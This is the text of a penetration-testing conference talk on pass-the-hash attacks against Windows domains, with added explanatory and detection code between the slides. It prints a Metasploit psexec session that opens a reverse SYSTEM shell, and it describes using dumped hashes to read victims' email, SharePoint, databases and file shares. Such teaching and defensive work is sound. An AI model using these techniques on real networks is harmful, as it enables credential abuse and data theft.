Access All your Data 
Do You Know Who I Am? 


Alva 'Skip' Duckwall 

• Full Scope Pen-Tester for Northrop Grumman 

• GSE, OSCP, CISSP, CISA, RHCE, among others 

• 19 Years Working with Linux 


Chris Campbell 

• Full Scope Pen-Tester for Northrop Grumman 

• MSIA, OSCP, CISSP, CISA, MCSE, among others 

• Former Army Signal Officer 



Shameless Plug 

Patches available from: 
http://code.google.com/p/passing-the-hash/ 

Also Chris and I will be blogging about how to 
use the various tools in the coming weeks: 

http://passing-the-hash.blogspot.com/ 


Twitter @passingthehash @obscuresec (chris) 



A Little History 


In 1997 Paul Ashton posted the theory about the first "Pass 
the Hash" attack to NTBugTraq against the Lan Manager 
protocol 


The result? 


A modified Samba client that accepts LM hashes instead of 
a password to access a remote file share. 



Your Data is Your Kingdom 

Business Relies on Data 


• Email 

• Files on a Share 

• Intranet Applications (Sharepoint) 

• Databases 

What would happen if somebody else had control 
of your data? 



Typical Day at the Microsoft Office 


A Regular User's Day: 

• Login 

• Check Email 

• Visit the Intranet 

A Sysad's day - All of the above plus: 

• Log into a Database 

• Manage Servers / Services 


All of This and the Password Only Gets Typed Once 



The Windows Single Sign On 

Once A User Logs In, Their Credentials are 
Cached Locally and Reused by the OS on 
the User's Behalf 


User Prompted Rarely After Initial Login 
Password Hashes are Cached Locally 
Plaintext as Well (Digest Auth) 



Windows Password Hashes 


Passwords Hashed 2 Different Ways: 

• LM (Lan Manager) Hash 

• NTLM Hash 


Modern versions of Windows don't save LM 
hashes, however they are still calculated and 
stored in memory if the password is 14 
characters or less, even if they aren't saved... 



Logging In 


When a User Logs in, a security token is 
created containing: 

• Security Identifiers (SID) for the user 

• SIDs for all groups the user is a member of 

• Default ACLs (if no other ACLs apply) 

• Per User Audit Settings 

• Impersonation Level 



Impersonation 

Tokens have 4 Different Security Levels: 

• Anonymous 

• Identification 

• Impersonation 

• Delegation 

Interactive logins (Windows Console) -> delegation tokens 
Non-interactive (Network Login) -> impersonation tokens 

"Incognito" tool / module allows for a lot of post exploitation 
fun with tokens allowing a malicious user to steal other 
identities of people logged into a server... 



Windows Authentication Methods 


Kerberos 

• Uses Tickets 

• Tickets can be reused for lower overhead 
NTLM 

• Challenge Response Protocol 

• Every Transaction Authenticated, high overhead 

Digest Authentication 

• Hashed Password (Usually with MD5) 

• Requires Plaintext Password to Be Stored 



Windows Authentication Methods (contd) 

Smart Cards 

• Two Factor Authentication, Bolted onto Kerberos 

• Only for Interactive (Console) Sessions 

• Hashes Still Stored on the Back End 

Keyfobs, etc. (SecurID) 

• Two Factor Authentication 

• Only used for Interactive Logons 

• Radius (or Radius-like) Used on the Back End - Gives 
Thumbs Up/Down on 2nd Factor 

• Password Hashes Used on the Back End 



Kerberos vs. NTLM 


Kerberos 

• Default 

• Both Client/server Must Be in the Domain 

• Reliance on DNS 

NTLM 

• Used if Client/server not in the Domain 

• Used if Addressed by IP 



Services that Can Use NTLM 


Web Services 

o Sharepoint 

o Custom Web Apps (.net Based) 

Exchange 

o MAPI 
o IMAP/POP3 
o SMTP 

Things that Can't Join the Domain 

o Appliances 

o Printers / Copiers / Digital Senders 



Difficult to Eliminate NTLM 


Only Recently Implemented 

• Requires Windows 7 for All Clients 

• Domain Must be at 2008R2 Functional Level 

Probably Will Break Things 

• Copiers / Printers / Digital Senders 

• Web Apps/ Appliances 

• Internet / Customer Facing Applications 

• Anything Not In the Domain 



Passing the Hash 


Windows Authentication Protocols Operate on 
Password Hashes 


• Kerberos Uses the NT Hash as an Encryption Key 

• NTLM Uses Password Hashes as Part of the Challenge 
Response 

o Password Hash along with nonce Hashed to 
Confirm Knowledge of the Password 
o Excellent Detailed Descriptions of the Process 
available at the Davenport Website 
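To make the point above concrete, here is an added example (not code from the talk or from any of the tools it mentions) that implements the NTLMv2 computation from MS-NLMP: the client's response and the server's verification are both keyed only by the 16-byte NT hash, so whoever holds the hash can answer the challenge. All hash, challenge and domain values are constructed for the demo.

```python
import hmac
import hashlib
import struct

def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    # NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the 16-byte NT hash over
    # UPPER(user) + domain in UTF-16LE. The password itself never appears here.
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()

def ntlmv2_response(nt_hash, user, domain, server_challenge, client_challenge, timestamp, target_info):
    # Client side: build the "blob" (temp) and NTProofStr = HMAC-MD5(key, ServerChallenge || blob).
    # Layout: RespType 0x01, HiRespType 0x01, Z(6), Time (8), ClientChallenge (8), Z(4), AvPairs, Z(4)
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    key = ntowf_v2(nt_hash, user, domain)
    nt_proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob

def verify_ntlmv2(nt_hash, user, domain, server_challenge, response) -> bool:
    # Server side (or the DC answering over Netlogon): recompute NTProofStr from the
    # stored NT hash and compare. Whoever holds the hash passes, password or not.
    nt_proof, blob = response[:16], response[16:]
    key = ntowf_v2(nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)

# Constructed demo values (not real credentials): a dumped NT hash is all the client needs.
DEMO_NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")
DEMO_SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
DEMO_CLIENT_CHALLENGE = bytes.fromhex("fedcba9876543210")
# One AvPair (MsvAvNbDomainName = 0x0002, length 12) followed by MsvAvEOL
DEMO_TARGET_INFO = b"\x02\x00\x0c\x00" + "DOMAIN".encode("utf-16le") + b"\x00\x00\x00\x00"

def demo() -> bool:
    resp = ntlmv2_response(DEMO_NT_HASH, "alice", "DOMAIN", DEMO_SERVER_CHALLENGE,
                           DEMO_CLIENT_CHALLENGE, 0x01D2BEEF00000000, DEMO_TARGET_INFO)
    return verify_ntlmv2(DEMO_NT_HASH, "alice", "DOMAIN", DEMO_SERVER_CHALLENGE, resp)

if __name__ == "__main__":
    print("client holding only the NT hash authenticates:", demo())
```

Because the NT hash is the only secret in this exchange, it is a password equivalent: protecting it (LSASS memory, SAM/NTDS dumps, cached credentials) matters as much as protecting the password.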



Knocked Over The DC, Got the Hashes, 
Now What? 

Maybe Crack the Passwords? 

• Works for Weak or Easily Guessed 
Passwords 

• Can Look Impressive if Wildly Successful 
(>50%) 

• Might not be allowed by the Rules of 
Engagement 

• Lacks C-Level "Wow" Factor 



Perhaps a Traditional Pass The 
Hash Attack? 


msf > search smb hash 
Matching Modules 

Name                                     Disclosure Date          Rank    Description 
auxiliary/admin/oracle/ora_ntlm_stealer  2009-04-07 00:00:00 UTC  normal  Oracle SMB Relay Code Execution 
auxiliary/admin/smb/upload_file                                   normal  SMB File Upload Utility 
auxiliary/server/capture/smb                                      normal  Authentication Capture: SMB 
auxiliary/spoof/nbns/nbns_response                                normal  NetBIOS Name Service Spoofer 
exploit/windows/smb/psexec               1999-01-01 00:00:00 UTC  manual  Microsoft Windows Authenticated User Code Execution 









Super Sexy for Pentesters... 


msf exploit(psexec) > exploit 

[*] Started reverse handler on 172.16.1.200:4444 
[*] Connecting to the server... 
[*] Authenticating to 172.16.1.1:445|demo as user 'administrator'... 
[*] Uploading payload... 
[*] Created \asOYOknq.exe... 
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.1.1[\svcctl] ... 
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.1.1[\svcctl] ... 
[*] Obtaining a service manager handle... 
[*] Creating a new service (UAqjbGny - "MwDHMrV")... 
[*] Closing service handle... 
[*] Opening service... 
[*] Starting the service... 
[*] Removing the service... 
[*] Closing service handle... 
[*] Deleting \asOYOknq.exe... 
[*] Sending stage (240 bytes) to 172.16.1.1 
[*] Command shell session 1 opened (172.16.1.200:4444 -> 172.16.1.1:56642) at 2012-07-13 01:10:1 
Microsoft Windows [Version 6.0.6002] 
Copyright (c) 2006 Microsoft Corporation. All rights reserved. 

C:\Windows\system32> 



For C-Level folks... Not so Much 


Microsoft Windows [Version 6.0.6002] 

Copyright (c) 2006 Microsoft Corporation. All rights reserved. 

C:\Windows\system32>whoami 
whoami 

nt authority\system 


“I don’t know anybody named NT System in my company...” 




Boring! 


"You logged into the Domain Controller, but you 
can't read my email. We're secure, right?" 


Remember, the Crown Jewels of the Network is 
the Data. Nobody gets excited unless that's 
put at risk. 



Slightly More Interesting PTH 

Access File Shares 

• Find all sorts of Interesting Things 

o Personally Identifiable Information 
o Database Dumps 
o Saved Email 
o Inventory Information 
o Design Specs 
o etc, etc, etc 

• Accessing Proprietary Information Starts 
Getting Some Attention 

• We can use a Modified Samba Client (more 
later) 



Accessing Data 


Many Windows Applications Pass The Hash to 
Access Data, Why Can't We? 



Demo Domain Assumptions 

• Sitting Inside the Domain 

• Already Dumped the Hashes (Post 
Exploitation) 

• We care about 3 people 
o Alice 
o Bob 
o CEO 



Our Windows Attack Platform 

Windows 7 - Fully Patched 
Not a Member of the Domain 
No Antivirus 

No Host-Based Intrusion Detection 
No Host-Based Intrusion Prevention 

Latest Version of the Windows Credential 
Editor by Hernan Ochoa 

Client Software We Want to Use 



WCE Overview 


Written by Hernan Ochoa of Amplia Security 

• Successor to the Pass The Hash Toolkit 

• Capable of examining memory to list hashes for all 
logged in users (-I) 

• Can Be Used to Inject or Dump Kerberos Tickets 
(-k/-K) 

• Can Be Used to Change the Credentials of the currently 
logged in session (-s ) 

• Can Be Used to Launch a Program with Different 
Credentials in a New Session (-c ) 



Why Not CMD.EXE? 


Running WCE with both '-s' and '-o' allows us to 
create a new process running as an arbitrary 
domain user with their hash. 

Using cmd.exe as the process, any command 
executed from this DOS box will be running 
as that user, even if the local computer isn't 
on the domain! 



Or explorer.exe 


Using Task Manager, We Kill Explorer.exe and 
restart it using WCE. 

This allows us to Browse File Shares Using 
Explorer as the User. Also, any programs 
started with the "Start Menu" automatically 
get launched as that user as well... 



Now What? 


Launch IE at the Local Sharepoint Site. 

Internet Explorer might need to be configured 
to automatically pass credentials: 


1. IE config: security -> custom level for the zone -> 
automatic logon only in intranet zone 

2. Add Sharepoint to the Local Intranets Group 



How About Outlook? 


Use Outlook to Access Email/Calendar for Our 
Impersonated User. 

1. Enable profiles in the Mail Control Panel: 
Control panel -> mail -> always prompt for 
profiles 

2. Create a Profile for Each User 



Access File Shares 


We can either use the Explorer.exe trick or use 
net commands to mount / browse file shares. 


Note: The '/savecred' option doesn't work with 
hashes. Apparently it only saves a plaintext 
password... who knew? 



MS SQL 


Simply launch the MSSQL client and point it at 
a database to log in, assuming it uses 
Windows Authentication... 

Access or Monkey with the Data, depending on 
the ROE of course... 



Sysadmin Tasks 

Simply run from the command line: 

• PSExec (Sysinternals) 

• WMI 

• Powershell 

o new feature in Win8, Web powershell 

• WinRM (if enabled) 

• Active Directory Users and Computers 

• Computer Management 



Windows Demo 


Pictures worth a thousand words... 



Demo Gotchas 


Outlook 2007 inconsistent 

• One demo environment worked fine, another 
didn't 

• Outlook 2003 worked perfectly ;-) 

ADUC couldn't assign passwords, but could 
change group membership, create computer 
accounts 



Demo Gotchas (contd) 

Admod password weirdness 

• Short random passwords fail sporadically 

• Long random passwords work consistently 

Can't open Multiple GUI apps as multiple users 
at the same time (IE/Outlook) 

• Probably just spawns another thread rather 
than another process 



It Works, But... 


Obviously Windows behaves strangely if you 
do this... expect other magical failures or 
side effects! 



What About Linux? 

Meh, I'm a Linux guy... 

How about we do all of that with Linux instead? 



The Foofus Patch 


The previously mentioned modified version of 
Samba was patched by JMK of Foofus.net. 

• Allows Us to Set an Environmental Variable 
with the password hash we want to 
substitute 

• Substitutes the hash in all the appropriate 
places for NTLM authentication 



An Additional Technique We Added 

Instead of the environmental variable, the hash 
can be specified as the password as long as 
it's in one of 2 forms: 

• LM:NT (65 chars) 

• LM:NT::: (68 chars, thanks JMK for the 
suggestion) 

• If the password is 65 or 68 characters long, 
substitute the hash 



Benefits of the New Technique 

Easier to use in scripts - just change the 
password 


Allows us to pass hashes in GUI programs 
without the need to kill and reset 
environmental variables 



Anatomy of a Patch 

Find where the application hashes the 
password in the source code 

Check to see if the password is 65 or 68 
characters 

If so, convert the 32-byte NT Hash into a 16-byte 
array by converting 2 hex nibbles into a 
byte, then substitute 
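The recognition step described on the last two slides (the 65/68-character LM:NT and LM:NT::: forms, and the nibble-to-byte conversion), written out as an added Python example; this is not the Samba or Firefox patch code itself, and it adds one check the slides do not mention (rejecting a string of the right length that is not hex). The sample values are the well-known empty-password LM and NT hashes.

```python
LM_NT_LEN, LM_NT_COLONS_LEN = 65, 68   # "LM:NT" and "LM:NT:::" forms from the talk

def hex_to_bytes(hex_str: str) -> bytes:
    # Two hex nibbles -> one byte, turning the 32 hex characters of a hash
    # into the 16-byte array the NTLM code expects in place of the real hash.
    out = bytearray()
    for i in range(0, len(hex_str), 2):
        out.append(int(hex_str[i:i + 2], 16))   # ValueError on a non-hex nibble
    return bytes(out)

def password_to_hashes(password: str):
    # Returns (lm_hash, nt_hash) as 16-byte values if the "password" is really a
    # pasted hash pair, else None meaning "hash this as an ordinary password".
    if len(password) == LM_NT_COLONS_LEN and password.endswith(":::"):
        password = password[:-3]
    if len(password) != LM_NT_LEN or password[32] != ":":
        return None
    lm_hex, nt_hex = password[:32], password[33:]
    try:
        return hex_to_bytes(lm_hex), hex_to_bytes(nt_hex)
    except ValueError:     # added check: right length, but the content is not hex
        return None

# Constructed sample value: the well-known empty-password LM and NT hashes in pwdump form.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

if __name__ == "__main__":
    lm, nt = password_to_hashes(EMPTY_LM + ":" + EMPTY_NT + ":::")
    print(lm.hex(), nt.hex(), len(nt))
```

The flip side of keying on length alone is that a genuine 65- or 68-character password would be misread as a hash pair, which is why the hex check above is worth keeping.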



Samba - Just for Shares, Right? 

• Libraries for Interfacing with MS DCE/RPC 

• Utilities for Managing Windows Domains / Users 


Multiple 3rd party programs link in with Samba for access 
to MS DCE/RPC. Patching Samba will patch 
downstream programs... 


We are releasing "The Pass the Hash Rosetta Stone". It's 
a list of Samba commands and their Corresponding 
Windows 'Net' commands for common tasks. 



Utilities That Link with Samba 

Winexe 

• PSExec Clone (32/64 bit) 

WMI 

• Run basic WMI queries from Linux 

• Includes blind command execution via WMI 

Openchange 

• Open-source framework to interface with 
Exchange from Linux 



What About Firefox? 


By default Firefox tries to query the Local OS 
for NTLM creds if enabled 

Or 

Use Firefox's built-in implementation based on 
Davenport 

o Patched Firefox's NTLM implementation with the 
65/68 character Hash Patch 
o Enabled in "about:config" 

network.auth.force-generic-ntlm -> true 



What About MSSQL? 


FreeTDS 

• Provides Libraries to Interface with Sybase / 
MS SQL 

• NTLM Authentication Code Based on 
Davenport (Guess what we already have 
code for?) 

• Combine with SQSH (SQL Shell) to Gain 
Interactive Access to Databases for Linux 



Linux Demo 



Defenses 

Try to Eliminate the Use of NTLM 

• Difficult To Do 

• Requires 2008R2 Domain Functional Level 

• All Clients Need to Be Windows 7 

• Will Break Things That Can't Do Kerberos 

o Printers / Copiers / Digital Senders 
o Appliances 
o Potentially NAS Devices 


Of Course, a Defense in Depth Approach to 
Preventing Compromise of the DC Works Too! 
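Where NTLM cannot be eliminated, it can at least be watched. The following is an added detection sketch (not from the talk) that runs over constructed Security log 4624 events flattened to key=value pairs: it flags NTLM network logons from a workstation name that is not in the domain computer inventory (the attack platform in the demo is deliberately not a domain member) and privileged accounts authenticating over NTLM where Kerberos would be the default. The inventory and watch list are assumed inputs.

```python
# Constructed sample 4624 (successful logon) events, flattened to key=value pairs.
# Field names follow the event's EventData element; all values are made up.
SAMPLE_EVENTS = [
    "EventID=4624 TargetUserName=alice LogonType=3 AuthenticationPackageName=Kerberos WorkstationName=WS01 IpAddress=10.0.0.21",
    "EventID=4624 TargetUserName=bob LogonType=3 AuthenticationPackageName=NTLM WorkstationName=WS02 IpAddress=10.0.0.22",
    "EventID=4624 TargetUserName=ceo LogonType=3 AuthenticationPackageName=NTLM WorkstationName=LAPTOP-X1 IpAddress=10.0.0.99",
    "EventID=4624 TargetUserName=administrator LogonType=3 AuthenticationPackageName=NTLM WorkstationName=WS02 IpAddress=10.0.0.22",
    "EventID=4624 TargetUserName=alice LogonType=2 AuthenticationPackageName=NTLM WorkstationName=WS01 IpAddress=-",
]
# Assumed inputs: domain-joined computers (e.g. exported from ADUC) and a privileged-account watch list.
DOMAIN_COMPUTERS = {"WS01", "WS02", "FS01", "DC01"}
PRIVILEGED_ACCOUNTS = {"administrator"}

def parse_event(line: str) -> dict:
    return dict(field.split("=", 1) for field in line.split())

def classify(event: dict, domain_computers=DOMAIN_COMPUTERS, privileged=PRIVILEGED_ACCOUNTS):
    # Only network logons (type 3) that negotiated NTLM matter: between two domain members
    # Kerberos is the default, so NTLM means a non-member client, an IP-addressed target,
    # or a device that cannot do Kerberos.
    if event.get("EventID") != "4624" or event.get("LogonType") != "3":
        return None
    if event.get("AuthenticationPackageName") != "NTLM":
        return None
    if event.get("WorkstationName", "").upper() not in domain_computers:
        return "high"       # NTLM from a machine that is not in the domain inventory
    if event.get("TargetUserName", "").lower() in privileged:
        return "medium"     # privileged account used over NTLM instead of Kerberos
    return "low"            # expected NTLM use (printers, appliances, IP-addressed hosts)

def find_suspicious(lines, domain_computers=DOMAIN_COMPUTERS, privileged=PRIVILEGED_ACCOUNTS):
    hits = []
    for line in lines:
        ev = parse_event(line)
        severity = classify(ev, domain_computers, privileged)
        if severity in ("high", "medium"):
            hits.append((severity, ev["TargetUserName"], ev["WorkstationName"], ev["IpAddress"]))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit)
```

WorkstationName in a 4624 event is supplied by the client in the NTLM AUTHENTICATE message, so treat it as a hint and correlate with IpAddress rather than trusting it on its own.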



Kerberos Is Safe, Right? 


Kerberos Uses NT Hashes for Encrypting 
Tickets to Principals 

• Discussed in More Detail in the Whitepaper 

• Short Version: Compromising the Encryption 
Keys is Still Very Bad(tm)! 



Quick Recap 


Windows + WCE + Hashes = Access To Data 

• Native Windows Tools Work Albeit Oddly at Times 

• Definitely Not Exactly How Windows Wants to Work 

Linux + PTH Tools + Hashes = Access To Data 

• Open Source Tools FTW! 

• Exchange, MS SQL, Sharepoint, File shares 



Shouts! 


Aaron, Pete, Mike, Jeff, Brian 
jcran, Will, Damien 



Questions? 



Help Us Get Better! 


Please Fill Out The Speaker Surveys! 



